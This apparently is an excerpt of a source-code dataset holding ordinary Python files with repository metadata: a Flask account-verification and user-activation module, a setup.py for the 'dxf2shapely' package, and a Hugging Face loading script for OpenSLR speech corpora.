return redirect(url_for('main.resend_email_verification'))
# token contains json blob of format: {'user_id': '...', 'secret_code': '...'} (secret_code is unused)
token_data = json.loads(token_data)
user = User.from_id(token_data['user_id'])
if not user:
abort(404)
if user.is_active:
flash("That verification link has expired.")
return redirect(url_for('main.sign_in'))
if user.email_auth:
session.pop('user_details', None)
return activate_user(user.id)
user.send_verify_code()
session['user_details'] = {"email": user.email_address, "id": user.id}
return redirect(url_for('main.verify'))
def activate_user(user_id):
user = User.from_id(user_id)
# the user will have a new current_session_id set by the API - store it in the cookie for future requests
session['current_session_id'] = user.current_session_id
organisation_id = session.get('organisation_id')
activated_user = user.activate()
activated_user.login()
invited_user = InvitedUser.from_session()
if invited_user:
service_id = _add_invited_user_to_service(invited_user)
service = Service.from_id(service_id)
if service.has_permission('broadcast'):
if service.live:
return redirect(url_for('main.broadcast_tour_live', service_id=service.id, step_index=1))
else:
return redirect(url_for('main.broadcast_tour', service_id=service.id, step_index=1))
return redirect(url_for('main.service_dashboard', service_id=service_id))
invited_org_user = InvitedOrgUser.from_session()
if invited_org_user:
user_api_client.add_user_to_organisation(invited_org_user.organisation, user_id)
if organisation_id:
return redirect(url_for('main.organisation_dashboard', org_id=organisation_id))
else:
return redirect(url_for('main.add_service', first='first'))
def _add_invited_user_to_service(invitation):
user = User.from_id(session['user_id'])
service_id = invitation.service
user.add_to_service(
service_id,
invitation.permissions,
invitation.folder_permissions,
invitation.from_user.id,
)
return service_id
| 32.378378 | 109 | 0.698943 | import json
from flask import (
abort,
current_app,
flash,
redirect,
render_template,
session,
url_for,
)
from itsdangerous import SignatureExpired
from notifications_utils.url_safe_token import check_token
from app import user_api_client
from app.main import main
from app.main.forms import TwoFactorForm
from app.models.service import Service
from app.models.user import InvitedOrgUser, InvitedUser, User
from app.utils.login import redirect_to_sign_in
@main.route('/verify', methods=['GET', 'POST'])
@redirect_to_sign_in
def verify():
user_id = session['user_details']['id']
def _check_code(code):
return user_api_client.check_verify_code(user_id, code, 'sms')
form = TwoFactorForm(_check_code)
if form.validate_on_submit():
session.pop('user_details', None)
return activate_user(user_id)
return render_template('views/two-factor-sms.html', form=form)
@main.route('/verify-email/<token>')
def verify_email(token):
try:
token_data = check_token(
token,
current_app.config['SECRET_KEY'],
current_app.config['DANGEROUS_SALT'],
current_app.config['EMAIL_EXPIRY_SECONDS']
)
except SignatureExpired:
flash("The link in the email we sent you has expired. We've sent you a new one.")
return redirect(url_for('main.resend_email_verification'))
# token contains json blob of format: {'user_id': '...', 'secret_code': '...'} (secret_code is unused)
token_data = json.loads(token_data)
user = User.from_id(token_data['user_id'])
if not user:
abort(404)
if user.is_active:
flash("That verification link has expired.")
return redirect(url_for('main.sign_in'))
if user.email_auth:
session.pop('user_details', None)
return activate_user(user.id)
user.send_verify_code()
session['user_details'] = {"email": user.email_address, "id": user.id}
return redirect(url_for('main.verify'))
def activate_user(user_id):
user = User.from_id(user_id)
# the user will have a new current_session_id set by the API - store it in the cookie for future requests
session['current_session_id'] = user.current_session_id
organisation_id = session.get('organisation_id')
activated_user = user.activate()
activated_user.login()
invited_user = InvitedUser.from_session()
if invited_user:
service_id = _add_invited_user_to_service(invited_user)
service = Service.from_id(service_id)
if service.has_permission('broadcast'):
if service.live:
return redirect(url_for('main.broadcast_tour_live', service_id=service.id, step_index=1))
else:
return redirect(url_for('main.broadcast_tour', service_id=service.id, step_index=1))
return redirect(url_for('main.service_dashboard', service_id=service_id))
invited_org_user = InvitedOrgUser.from_session()
if invited_org_user:
user_api_client.add_user_to_organisation(invited_org_user.organisation, user_id)
if organisation_id:
return redirect(url_for('main.organisation_dashboard', org_id=organisation_id))
else:
return redirect(url_for('main.add_service', first='first'))
def _add_invited_user_to_service(invitation):
user = User.from_id(session['user_id'])
service_id = invitation.service
user.add_to_service(
service_id,
invitation.permissions,
invitation.folder_permissions,
invitation.from_user.id,
)
return service_id
| true | true |
f723039db00b27262888fac5433c80f9b006121c | 858 | py | Python | setup.py | Ricyteach/dxf2shapely | fc6de4e05cbb77e77a5866afdb69cc817bb67027 | [
"MIT"
] | null | null | null | setup.py | Ricyteach/dxf2shapely | fc6de4e05cbb77e77a5866afdb69cc817bb67027 | [
"MIT"
] | null | null | null | setup.py | Ricyteach/dxf2shapely | fc6de4e05cbb77e77a5866afdb69cc817bb67027 | [
"MIT"
] | null | null | null | from setuptools import setup
requirements = ['ezdxf', 'shapely']
setup_requirements = ['pytest-runner', ]
test_requirements = ['pytest']
setup(
classifiers=[
'Development Status :: 5 - Production/Stable',
'Intended Audience :: Developers',
'License :: OSI Approved :: MIT License',
'Natural Language :: English',
'Programming Language :: Python :: 3.7',
],
name='dxf2shapely',
version='1.1',
packages=['dxf2shapely'],
url='https://github.com/Ricyteach/dxf2shapely',
install_requires=requirements,
license='MIT',
author='Ricky L Teachey Jr',
author_email='ricky@teachey.org',
description='Very limited tool for grabbing line segments from pre-curated dxf files and turning them into shapely Polygons. ',
test_suite = 'tests',
tests_require = test_requirements,
)
| 29.586207 | 131 | 0.664336 | from setuptools import setup
requirements = ['ezdxf', 'shapely']
setup_requirements = ['pytest-runner', ]
test_requirements = ['pytest']
setup(
classifiers=[
'Development Status :: 5 - Production/Stable',
'Intended Audience :: Developers',
'License :: OSI Approved :: MIT License',
'Natural Language :: English',
'Programming Language :: Python :: 3.7',
],
name='dxf2shapely',
version='1.1',
packages=['dxf2shapely'],
url='https://github.com/Ricyteach/dxf2shapely',
install_requires=requirements,
license='MIT',
author='Ricky L Teachey Jr',
author_email='ricky@teachey.org',
description='Very limited tool for grabbing line segments from pre-curated dxf files and turning them into shapely Polygons. ',
test_suite = 'tests',
tests_require = test_requirements,
)
| true | true |
f723040bf6d789d7bdbfc25e4410c4d49ac627b7 | 20,859 | py | Python | datasets/openslr/openslr.py | PierreColombo/datasets | c22ec7e64edb6596a6ff5894712dea4dc5441de8 | [
"Apache-2.0"
] | 1 | 2021-07-29T06:28:28.000Z | 2021-07-29T06:28:28.000Z | datasets/openslr/openslr.py | norabelrose/datasets | b0511c65b32d1103d34cb5ac9ffb50e9cf387843 | [
"Apache-2.0"
] | null | null | null | datasets/openslr/openslr.py | norabelrose/datasets | b0511c65b32d1103d34cb5ac9ffb50e9cf387843 | [
"Apache-2.0"
] | 1 | 2021-05-04T16:54:23.000Z | 2021-05-04T16:54:23.000Z | # coding=utf-8
# Copyright 2021 The HuggingFace Datasets Authors and the current dataset script contributor.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
""" OpenSLR Dataset"""
from __future__ import absolute_import, division, print_function
import os
import re
from pathlib import Path
import datasets
_DATA_URL = "https://openslr.org/resources/{}"
_CITATION = """\
SLR35, SLR36:
@inproceedings{kjartansson-etal-sltu2018,
title = {{Crowd-Sourced Speech Corpora for Javanese, Sundanese, Sinhala, Nepali, and Bangladeshi Bengali}},
author = {Oddur Kjartansson and Supheakmungkol Sarin and Knot Pipatsrisawat and Martin Jansche and Linne Ha},
booktitle = {Proc. The 6th Intl. Workshop on Spoken Language Technologies for Under-Resourced Languages (SLTU)},
year = {2018},
address = {Gurugram, India},
month = aug,
pages = {52--55},
URL = {http://dx.doi.org/10.21437/SLTU.2018-11},
}
SLR41, SLR42, SLR43, SLR44:
@inproceedings{kjartansson-etal-tts-sltu2018,
title = {{A Step-by-Step Process for Building TTS Voices Using Open Source Data and Framework for Bangla, Javanese, Khmer, Nepali, Sinhala, and Sundanese}},
author = {Keshan Sodimana and Knot Pipatsrisawat and Linne Ha and Martin Jansche and Oddur Kjartansson and Pasindu De Silva and Supheakmungkol Sarin},
booktitle = {Proc. The 6th Intl. Workshop on Spoken Language Technologies for Under-Resourced Languages (SLTU)},
year = {2018},
address = {Gurugram, India},
month = aug,
pages = {66--70},
URL = {http://dx.doi.org/10.21437/SLTU.2018-14}
}
SLR63, SLR64, SLR65, SLR66, SLR78, SLR79:
@inproceedings{he-etal-2020-open,
title = {{Open-source Multi-speaker Speech Corpora for Building Gujarati, Kannada, Malayalam, Marathi, Tamil and Telugu Speech Synthesis Systems}},
author = {He, Fei and Chu, Shan-Hui Cathy and Kjartansson, Oddur and Rivera, Clara and Katanova, Anna and Gutkin, Alexander and Demirsahin, Isin and Johny, Cibu and Jansche, Martin and Sarin, Supheakmungkol and Pipatsrisawat, Knot},
booktitle = {Proceedings of The 12th Language Resources and Evaluation Conference (LREC)},
month = may,
year = {2020},
address = {Marseille, France},
publisher = {European Language Resources Association (ELRA)},
pages = {6494--6503},
url = {https://www.aclweb.org/anthology/2020.lrec-1.800},
ISBN = "{979-10-95546-34-4},
}
SLR69, SLR76, SLR77:
@inproceedings{kjartansson-etal-2020-open,
title = {{Open-Source High Quality Speech Datasets for Basque, Catalan and Galician}},
author = {Kjartansson, Oddur and Gutkin, Alexander and Butryna, Alena and Demirsahin, Isin and Rivera, Clara},
booktitle = {Proceedings of the 1st Joint Workshop on Spoken Language Technologies for Under-resourced languages (SLTU) and Collaboration and Computing for Under-Resourced Languages (CCURL)},
year = {2020},
pages = {21--27},
month = may,
address = {Marseille, France},
publisher = {European Language Resources association (ELRA)},
url = {https://www.aclweb.org/anthology/2020.sltu-1.3},
ISBN = {979-10-95546-35-1},
}
SLR71, SLR71, SLR72, SLR73, SLR74, SLR75:
@inproceedings{guevara-rukoz-etal-2020-crowdsourcing,
title = {{Crowdsourcing Latin American Spanish for Low-Resource Text-to-Speech}},
author = {Guevara-Rukoz, Adriana and Demirsahin, Isin and He, Fei and Chu, Shan-Hui Cathy and Sarin, Supheakmungkol and Pipatsrisawat, Knot and Gutkin, Alexander and Butryna, Alena and Kjartansson, Oddur},
booktitle = {Proceedings of The 12th Language Resources and Evaluation Conference (LREC)},
year = {2020},
month = may,
address = {Marseille, France},
publisher = {European Language Resources Association (ELRA)},
url = {https://www.aclweb.org/anthology/2020.lrec-1.801},
pages = {6504--6513},
ISBN = {979-10-95546-34-4},
}
SLR80
@inproceedings{oo-etal-2020-burmese,
title = {{Burmese Speech Corpus, Finite-State Text Normalization and Pronunciation Grammars with an Application to Text-to-Speech}},
author = {Oo, Yin May and Wattanavekin, Theeraphol and Li, Chenfang and De Silva, Pasindu and Sarin, Supheakmungkol and Pipatsrisawat, Knot and Jansche, Martin and Kjartansson, Oddur and Gutkin, Alexander},
booktitle = {Proceedings of The 12th Language Resources and Evaluation Conference (LREC)},
month = may,
year = {2020},
pages = "6328--6339",
address = {Marseille, France},
publisher = {European Language Resources Association (ELRA)},
url = {https://www.aclweb.org/anthology/2020.lrec-1.777},
ISBN = {979-10-95546-34-4},
}
SLR86
@inproceedings{gutkin-et-al-yoruba2020,
title = {{Developing an Open-Source Corpus of Yoruba Speech}},
author = {Alexander Gutkin and Işın Demirşahin and Oddur Kjartansson and Clara Rivera and Kọ́lá Túbọ̀sún},
booktitle = {Proceedings of Interspeech 2020},
pages = {404--408},
month = {October},
year = {2020},
address = {Shanghai, China},
publisher = {International Speech and Communication Association (ISCA)},
doi = {10.21437/Interspeech.2020-1096},
url = {https://dx.doi.org/10.21437/Interspeech.2020-1096},
}
"""
_DESCRIPTION = """\
OpenSLR is a site devoted to hosting speech and language resources, such as training corpora for speech recognition,
and software related to speech recognition. We intend to be a convenient place for anyone to put resources that
they have created, so that they can be downloaded publicly.
"""
_HOMEPAGE = "https://openslr.org/"
_LICENSE = ""
_RESOURCES = {
"SLR35": {
"Language": "Javanese",
"LongName": "Large Javanese ASR training data set",
"Category": "Speech",
"Summary": "Javanese ASR training data set containing ~185K utterances",
"Files": [
"asr_javanese_0.zip",
"asr_javanese_1.zip",
"asr_javanese_2.zip",
"asr_javanese_3.zip",
"asr_javanese_4.zip",
"asr_javanese_5.zip",
"asr_javanese_6.zip",
"asr_javanese_7.zip",
"asr_javanese_8.zip",
"asr_javanese_9.zip",
"asr_javanese_a.zip",
"asr_javanese_b.zip",
"asr_javanese_c.zip",
"asr_javanese_d.zip",
"asr_javanese_e.zip",
"asr_javanese_f.zip",
],
"IndexFiles": ["asr_javanese/utt_spk_text.tsv"] * 16,
"DataDirs": ["asr_javanese/data"] * 16,
},
"SLR36": {
"Language": "Sundanese",
"LongName": "Large Sundanese ASR training data set",
"Category": "Speech",
"Summary": "Sundanese ASR training data set containing ~220K utterances",
"Files": [
"asr_sundanese_0.zip",
"asr_sundanese_1.zip",
"asr_sundanese_2.zip",
"asr_sundanese_3.zip",
"asr_sundanese_4.zip",
"asr_sundanese_5.zip",
"asr_sundanese_6.zip",
"asr_sundanese_7.zip",
"asr_sundanese_8.zip",
"asr_sundanese_9.zip",
"asr_sundanese_a.zip",
"asr_sundanese_b.zip",
"asr_sundanese_c.zip",
"asr_sundanese_d.zip",
"asr_sundanese_e.zip",
"asr_sundanese_f.zip",
],
"IndexFiles": ["asr_sundanese/utt_spk_text.tsv"] * 16,
"DataDirs": ["asr_sundanese/data"] * 16,
},
"SLR41": {
"Language": "Javanese",
"LongName": "High quality TTS data for Javanese",
"Category": "Speech",
"Summary": "Multi-speaker TTS data for Javanese (jv-ID)",
"Files": ["jv_id_female.zip", "jv_id_male.zip"],
"IndexFiles": ["jv_id_female/line_index.tsv", "jv_id_male/line_index.tsv"],
"DataDirs": ["jv_id_female/wavs", "jv_id_male/wavs"],
},
"SLR42": {
"Language": "Khmer",
"LongName": "High quality TTS data for Khmer",
"Category": "Speech",
"Summary": "Multi-speaker TTS data for Khmer (km-KH)",
"Files": ["km_kh_male.zip"],
"IndexFiles": ["km_kh_male/line_index.tsv"],
"DataDirs": ["km_kh_male/wavs"],
},
"SLR43": {
"Language": "Nepali",
"LongName": "High quality TTS data for Nepali",
"Category": "Speech",
"Summary": "Multi-speaker TTS data for Nepali (ne-NP)",
"Files": ["ne_np_female.zip"],
"IndexFiles": ["ne_np_female/line_index.tsv"],
"DataDirs": ["ne_np_female/wavs"],
},
"SLR44": {
"Language": "Sundanese",
"LongName": "High quality TTS data for Sundanese",
"Category": "Speech",
"Summary": "Multi-speaker TTS data for Javanese Sundanese (su-ID)",
"Files": ["su_id_female.zip", "su_id_male.zip"],
"IndexFiles": ["su_id_female/line_index.tsv", "su_id_male/line_index.tsv"],
"DataDirs": ["su_id_female/wavs", "su_id_male/wavs"],
},
"SLR63": {
"Language": "Malayalam",
"LongName": "Crowdsourced high-quality Malayalam multi-speaker speech data set",
"Category": "Speech",
"Summary": "Data set which contains recordings of native speakers of Malayalam",
"Files": ["ml_in_female.zip", "ml_in_male.zip"],
"IndexFiles": ["line_index.tsv", "line_index.tsv"],
"DataDirs": ["", ""],
},
"SLR64": {
"Language": "Marathi",
"LongName": "Crowdsourced high-quality Marathi multi-speaker speech data set",
"Category": "Speech",
"Summary": "Data set which contains recordings of native speakers of Marathi",
"Files": ["mr_in_female.zip"],
"IndexFiles": ["line_index.tsv"],
"DataDirs": ["", ""],
},
"SLR65": {
"Language": "Tamil",
"LongName": "Crowdsourced high-quality Tamil multi-speaker speech data set",
"Category": "Speech",
"Summary": "Data set which contains recordings of native speakers of Tamil",
"Files": ["ta_in_female.zip", "ta_in_male.zip"],
"IndexFiles": ["line_index.tsv", "line_index.tsv"],
"DataDirs": ["", ""],
},
"SLR66": {
"Language": "Telugu",
"LongName": "Crowdsourced high-quality Telugu multi-speaker speech data set",
"Category": "Speech",
"Summary": "Data set which contains recordings of native speakers of Telugu",
"Files": ["te_in_female.zip", "te_in_male.zip"],
"IndexFiles": ["line_index.tsv", "line_index.tsv"],
"DataDirs": ["", ""],
},
"SLR69": {
"Language": "Catalan",
"LongName": "Crowdsourced high-quality Catalan speech data set",
"Category": "Speech",
"Summary": "Data set which contains recordings of Catalan",
"Files": ["ca_es_female.zip", "ca_es_male.zip"],
"IndexFiles": ["line_index.tsv", "line_index.tsv"],
"DataDirs": ["", ""],
},
"SLR70": {
"Language": "Nigerian English",
"LongName": "Crowdsourced high-quality Nigerian English speech data set",
"Category": "Speech",
"Summary": "Data set which contains recordings of Nigerian English",
"Files": ["en_ng_female.zip", "en_ng_male.zip"],
"IndexFiles": ["line_index.tsv", "line_index.tsv"],
"DataDirs": ["", ""],
},
"SLR71": {
"Language": "Chilean Spanish",
"LongName": "Crowdsourced high-quality Chilean Spanish speech data set",
"Category": "Speech",
"Summary": "Data set which contains recordings of Chilean Spanish",
"Files": ["es_cl_female.zip", "es_cl_male.zip"],
"IndexFiles": ["line_index.tsv", "line_index.tsv"],
"DataDirs": ["", ""],
},
"SLR72": {
"Language": "Columbian Spanish",
"LongName": "Crowdsourced high-quality Columbian Spanish speech data set",
"Category": "Speech",
"Summary": "Data set which contains recordings of Columbian Spanish",
"Files": ["es_co_female.zip", "es_co_male.zip"],
"IndexFiles": ["line_index.tsv", "line_index.tsv"],
"DataDirs": ["", ""],
},
"SLR73": {
"Language": "Peruvian Spanish",
"LongName": "Crowdsourced high-quality Peruvian Spanish speech data set",
"Category": "Speech",
"Summary": "Data set which contains recordings of Peruvian Spanish",
"Files": ["es_pe_female.zip", "es_pe_male.zip"],
"IndexFiles": ["line_index.tsv", "line_index.tsv"],
"DataDirs": ["", ""],
},
"SLR74": {
"Language": "Puerto Rico Spanish",
"LongName": "Crowdsourced high-quality Puerto Rico Spanish speech data set",
"Category": "Speech",
"Summary": "Data set which contains recordings of Puerto Rico Spanish",
"Files": ["es_pr_female.zip"],
"IndexFiles": ["line_index.tsv"],
"DataDirs": [""],
},
"SLR75": {
"Language": "Venezuelan Spanish",
"LongName": "Crowdsourced high-quality Venezuelan Spanish speech data set",
"Category": "Speech",
"Summary": "Data set which contains recordings of Venezuelan Spanish",
"Files": ["es_ve_female.zip", "es_ve_male.zip"],
"IndexFiles": ["line_index.tsv", "line_index.tsv"],
"DataDirs": ["", ""],
},
"SLR76": {
"Language": "Basque",
"LongName": "Crowdsourced high-quality Basque speech data set",
"Category": "Speech",
"Summary": "Data set which contains recordings of Basque",
"Files": ["eu_es_female.zip", "eu_es_male.zip"],
"IndexFiles": ["line_index.tsv", "line_index.tsv"],
"DataDirs": ["", ""],
},
"SLR77": {
"Language": "Galician",
"LongName": "Crowdsourced high-quality Galician speech data set",
"Category": "Speech",
"Summary": "Data set which contains recordings of Galician",
"Files": ["gl_es_female.zip", "gl_es_male.zip"],
"IndexFiles": ["line_index.tsv", "line_index.tsv"],
"DataDirs": ["", ""],
},
"SLR78": {
"Language": "Gujarati",
"LongName": "Crowdsourced high-quality Gujarati multi-speaker speech data set",
"Category": "Speech",
"Summary": "Data set which contains recordings of native speakers of Gujarati",
"Files": ["gu_in_female.zip", "gu_in_male.zip"],
"IndexFiles": ["line_index.tsv", "line_index.tsv"],
"DataDirs": ["", ""],
},
"SLR79": {
"Language": "Kannada",
"LongName": "Crowdsourced high-quality Kannada multi-speaker speech data set",
"Category": "Speech",
"Summary": "Data set which contains recordings of native speakers of Kannada",
"Files": ["kn_in_female.zip", "kn_in_male.zip"],
"IndexFiles": ["line_index.tsv", "line_index.tsv"],
"DataDirs": ["", ""],
},
"SLR80": {
"Language": "Burmese",
"LongName": "Crowdsourced high-quality Burmese speech data set",
"Category": "Speech",
"Summary": "Data set which contains recordings of Burmese",
"Files": ["my_mm_female.zip"],
"IndexFiles": ["line_index.tsv"],
"DataDirs": [""],
},
"SLR86": {
"Language": "Yoruba",
"LongName": "Crowdsourced high-quality Yoruba speech data set",
"Category": "Speech",
"Summary": "Data set which contains recordings of Yoruba",
"Files": ["yo_ng_female.zip", "yo_ng_male.zip"],
"IndexFiles": ["line_index.tsv", "line_index.tsv"],
"DataDirs": ["", ""],
},
}
class OpenSlrConfig(datasets.BuilderConfig):
"""BuilderConfig for OpenSlr."""
def __init__(self, name, **kwargs):
"""
Args:
data_dir: `string`, the path to the folder containing the files in the
downloaded .tar
citation: `string`, citation for the data set
url: `string`, url for information about the data set
**kwargs: keyword arguments forwarded to super.
"""
self.language = kwargs.pop("language", None)
self.long_name = kwargs.pop("long_name", None)
self.category = kwargs.pop("category", None)
self.summary = kwargs.pop("summary", None)
self.files = kwargs.pop("files", None)
self.index_files = kwargs.pop("index_files", None)
self.data_dirs = kwargs.pop("data_dirs", None)
description = f"Open Speech and Language Resources dataset in {self.language}. Name: {self.name}, Summary: {self.summary}."
super(OpenSlrConfig, self).__init__(name=name, description=description, **kwargs)
class OpenSlr(datasets.GeneratorBasedBuilder):
BUILDER_CONFIGS = [
OpenSlrConfig(
name=resource_id,
language=_RESOURCES[resource_id]["Language"],
long_name=_RESOURCES[resource_id]["LongName"],
category=_RESOURCES[resource_id]["Category"],
summary=_RESOURCES[resource_id]["Summary"],
files=_RESOURCES[resource_id]["Files"],
index_files=_RESOURCES[resource_id]["IndexFiles"],
data_dirs=_RESOURCES[resource_id]["DataDirs"],
)
for resource_id in _RESOURCES.keys()
]
def _info(self):
features = datasets.Features(
{
"path": datasets.Value("string"),
"sentence": datasets.Value("string"),
}
)
return datasets.DatasetInfo(
description=_DESCRIPTION,
features=features,
supervised_keys=None,
homepage=_HOMEPAGE,
license=_LICENSE,
citation=_CITATION,
)
def _split_generators(self, dl_manager):
"""Returns SplitGenerators."""
resource_number = self.config.name.replace("SLR", "")
urls = [f"{_DATA_URL.format(resource_number)}/{file}" for file in self.config.files]
dl_paths = dl_manager.download_and_extract(urls)
abs_path_to_indexs = [os.path.join(path, f"{self.config.index_files[i]}") for i, path in enumerate(dl_paths)]
abs_path_to_datas = [os.path.join(path, f"{self.config.data_dirs[i]}") for i, path in enumerate(dl_paths)]
return [
datasets.SplitGenerator(
name=datasets.Split.TRAIN,
gen_kwargs={
"path_to_indexs": abs_path_to_indexs,
"path_to_datas": abs_path_to_datas,
},
),
]
def _generate_examples(self, path_to_indexs, path_to_datas):
""" Yields examples. """
counter = -1
if self.config.name in ["SLR35", "SLR36"]:
sentence_index = {}
for i, path_to_index in enumerate(path_to_indexs):
with open(path_to_index, encoding="utf-8") as f:
lines = f.readlines()
for id_, line in enumerate(lines):
field_values = re.split(r"\t\t?", line.strip())
filename, user_id, sentence = field_values
sentence_index[filename] = sentence
for path_to_data in sorted(Path(path_to_datas[i]).rglob("*.flac")):
filename = path_to_data.stem
if path_to_data.stem not in sentence_index:
continue
path = str(path_to_data.resolve())
sentence = sentence_index[filename]
counter += 1
yield counter, {"path": path, "sentence": sentence}
else:
for i, path_to_index in enumerate(path_to_indexs):
with open(path_to_index, encoding="utf-8") as f:
lines = f.readlines()
for id_, line in enumerate(lines):
# Following regexs are needed to normalise the lines, since the datasets
# are not always consistent and have bugs:
line = re.sub(r"\t[^\t]*\t", "\t", line.strip())
field_values = re.split(r"\t\t?", line)
if len(field_values) != 2:
continue
filename, sentence = field_values
# set absolute path for audio file
path = os.path.join(path_to_datas[i], f"{filename}.wav")
counter += 1
yield counter, {"path": path, "sentence": sentence}
| 42.569388 | 234 | 0.608706 |
from __future__ import absolute_import, division, print_function
import os
import re
from pathlib import Path
import datasets
_DATA_URL = "https://openslr.org/resources/{}"
_CITATION = """\
SLR35, SLR36:
@inproceedings{kjartansson-etal-sltu2018,
title = {{Crowd-Sourced Speech Corpora for Javanese, Sundanese, Sinhala, Nepali, and Bangladeshi Bengali}},
author = {Oddur Kjartansson and Supheakmungkol Sarin and Knot Pipatsrisawat and Martin Jansche and Linne Ha},
booktitle = {Proc. The 6th Intl. Workshop on Spoken Language Technologies for Under-Resourced Languages (SLTU)},
year = {2018},
address = {Gurugram, India},
month = aug,
pages = {52--55},
URL = {http://dx.doi.org/10.21437/SLTU.2018-11},
}
SLR41, SLR42, SLR43, SLR44:
@inproceedings{kjartansson-etal-tts-sltu2018,
title = {{A Step-by-Step Process for Building TTS Voices Using Open Source Data and Framework for Bangla, Javanese, Khmer, Nepali, Sinhala, and Sundanese}},
author = {Keshan Sodimana and Knot Pipatsrisawat and Linne Ha and Martin Jansche and Oddur Kjartansson and Pasindu De Silva and Supheakmungkol Sarin},
booktitle = {Proc. The 6th Intl. Workshop on Spoken Language Technologies for Under-Resourced Languages (SLTU)},
year = {2018},
address = {Gurugram, India},
month = aug,
pages = {66--70},
URL = {http://dx.doi.org/10.21437/SLTU.2018-14}
}
SLR63, SLR64, SLR65, SLR66, SLR78, SLR79:
@inproceedings{he-etal-2020-open,
title = {{Open-source Multi-speaker Speech Corpora for Building Gujarati, Kannada, Malayalam, Marathi, Tamil and Telugu Speech Synthesis Systems}},
author = {He, Fei and Chu, Shan-Hui Cathy and Kjartansson, Oddur and Rivera, Clara and Katanova, Anna and Gutkin, Alexander and Demirsahin, Isin and Johny, Cibu and Jansche, Martin and Sarin, Supheakmungkol and Pipatsrisawat, Knot},
booktitle = {Proceedings of The 12th Language Resources and Evaluation Conference (LREC)},
month = may,
year = {2020},
address = {Marseille, France},
publisher = {European Language Resources Association (ELRA)},
pages = {6494--6503},
url = {https://www.aclweb.org/anthology/2020.lrec-1.800},
ISBN = "{979-10-95546-34-4},
}
SLR69, SLR76, SLR77:
@inproceedings{kjartansson-etal-2020-open,
title = {{Open-Source High Quality Speech Datasets for Basque, Catalan and Galician}},
author = {Kjartansson, Oddur and Gutkin, Alexander and Butryna, Alena and Demirsahin, Isin and Rivera, Clara},
booktitle = {Proceedings of the 1st Joint Workshop on Spoken Language Technologies for Under-resourced languages (SLTU) and Collaboration and Computing for Under-Resourced Languages (CCURL)},
year = {2020},
pages = {21--27},
month = may,
address = {Marseille, France},
publisher = {European Language Resources association (ELRA)},
url = {https://www.aclweb.org/anthology/2020.sltu-1.3},
ISBN = {979-10-95546-35-1},
}
SLR71, SLR71, SLR72, SLR73, SLR74, SLR75:
@inproceedings{guevara-rukoz-etal-2020-crowdsourcing,
title = {{Crowdsourcing Latin American Spanish for Low-Resource Text-to-Speech}},
author = {Guevara-Rukoz, Adriana and Demirsahin, Isin and He, Fei and Chu, Shan-Hui Cathy and Sarin, Supheakmungkol and Pipatsrisawat, Knot and Gutkin, Alexander and Butryna, Alena and Kjartansson, Oddur},
booktitle = {Proceedings of The 12th Language Resources and Evaluation Conference (LREC)},
year = {2020},
month = may,
address = {Marseille, France},
publisher = {European Language Resources Association (ELRA)},
url = {https://www.aclweb.org/anthology/2020.lrec-1.801},
pages = {6504--6513},
ISBN = {979-10-95546-34-4},
}
SLR80
@inproceedings{oo-etal-2020-burmese,
title = {{Burmese Speech Corpus, Finite-State Text Normalization and Pronunciation Grammars with an Application to Text-to-Speech}},
author = {Oo, Yin May and Wattanavekin, Theeraphol and Li, Chenfang and De Silva, Pasindu and Sarin, Supheakmungkol and Pipatsrisawat, Knot and Jansche, Martin and Kjartansson, Oddur and Gutkin, Alexander},
booktitle = {Proceedings of The 12th Language Resources and Evaluation Conference (LREC)},
month = may,
year = {2020},
pages = "6328--6339",
address = {Marseille, France},
publisher = {European Language Resources Association (ELRA)},
url = {https://www.aclweb.org/anthology/2020.lrec-1.777},
ISBN = {979-10-95546-34-4},
}
SLR86
@inproceedings{gutkin-et-al-yoruba2020,
title = {{Developing an Open-Source Corpus of Yoruba Speech}},
author = {Alexander Gutkin and Işın Demirşahin and Oddur Kjartansson and Clara Rivera and Kọ́lá Túbọ̀sún},
booktitle = {Proceedings of Interspeech 2020},
pages = {404--408},
month = {October},
year = {2020},
address = {Shanghai, China},
publisher = {International Speech and Communication Association (ISCA)},
doi = {10.21437/Interspeech.2020-1096},
url = {https://dx.doi.org/10.21437/Interspeech.2020-1096},
}
"""
_DESCRIPTION = """\
OpenSLR is a site devoted to hosting speech and language resources, such as training corpora for speech recognition,
and software related to speech recognition. We intend to be a convenient place for anyone to put resources that
they have created, so that they can be downloaded publicly.
"""
_HOMEPAGE = "https://openslr.org/"
_LICENSE = ""
_RESOURCES = {
"SLR35": {
"Language": "Javanese",
"LongName": "Large Javanese ASR training data set",
"Category": "Speech",
"Summary": "Javanese ASR training data set containing ~185K utterances",
"Files": [
"asr_javanese_0.zip",
"asr_javanese_1.zip",
"asr_javanese_2.zip",
"asr_javanese_3.zip",
"asr_javanese_4.zip",
"asr_javanese_5.zip",
"asr_javanese_6.zip",
"asr_javanese_7.zip",
"asr_javanese_8.zip",
"asr_javanese_9.zip",
"asr_javanese_a.zip",
"asr_javanese_b.zip",
"asr_javanese_c.zip",
"asr_javanese_d.zip",
"asr_javanese_e.zip",
"asr_javanese_f.zip",
],
"IndexFiles": ["asr_javanese/utt_spk_text.tsv"] * 16,
"DataDirs": ["asr_javanese/data"] * 16,
},
"SLR36": {
"Language": "Sundanese",
"LongName": "Large Sundanese ASR training data set",
"Category": "Speech",
"Summary": "Sundanese ASR training data set containing ~220K utterances",
"Files": [
"asr_sundanese_0.zip",
"asr_sundanese_1.zip",
"asr_sundanese_2.zip",
"asr_sundanese_3.zip",
"asr_sundanese_4.zip",
"asr_sundanese_5.zip",
"asr_sundanese_6.zip",
"asr_sundanese_7.zip",
"asr_sundanese_8.zip",
"asr_sundanese_9.zip",
"asr_sundanese_a.zip",
"asr_sundanese_b.zip",
"asr_sundanese_c.zip",
"asr_sundanese_d.zip",
"asr_sundanese_e.zip",
"asr_sundanese_f.zip",
],
"IndexFiles": ["asr_sundanese/utt_spk_text.tsv"] * 16,
"DataDirs": ["asr_sundanese/data"] * 16,
},
"SLR41": {
"Language": "Javanese",
"LongName": "High quality TTS data for Javanese",
"Category": "Speech",
"Summary": "Multi-speaker TTS data for Javanese (jv-ID)",
"Files": ["jv_id_female.zip", "jv_id_male.zip"],
"IndexFiles": ["jv_id_female/line_index.tsv", "jv_id_male/line_index.tsv"],
"DataDirs": ["jv_id_female/wavs", "jv_id_male/wavs"],
},
